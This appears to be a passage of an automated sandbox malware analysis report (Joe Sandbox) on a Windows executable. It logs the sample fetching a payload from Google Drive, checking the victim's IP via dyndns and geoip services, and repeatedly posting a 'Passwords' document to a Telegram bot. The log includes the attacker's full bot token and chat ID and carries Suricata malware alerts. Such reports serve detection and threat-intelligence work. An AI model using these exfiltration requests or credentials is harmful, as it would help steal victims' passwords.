            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31cd3062f03fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e34ecd4894Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f7fbc37367Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320c9a0f5891Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322544ac15bbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3239c22019d9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324b782691fcHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325fd91eb303Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327585b25b55Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32886eeb9cb4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3299f2df1cddHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32af710cb323Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c0da251c45Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d4e14bf837Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32e7854d3f76Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd330608dbbc35Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3319dc5c2cdfHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd332da11f00c2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33400739d22bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3354ff8faf06Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd336b37c3d0f8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33815fe28e68Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd339a0f1b022aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b014664df2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33cc7ddfd09cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49819 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49875 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49785 -> 142.250.181.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49828 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d382f37f4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036744000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000366D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/O
            Source: xXUnP7uCBJ.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000366D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036AE4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036B1D000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036935000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000368E5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
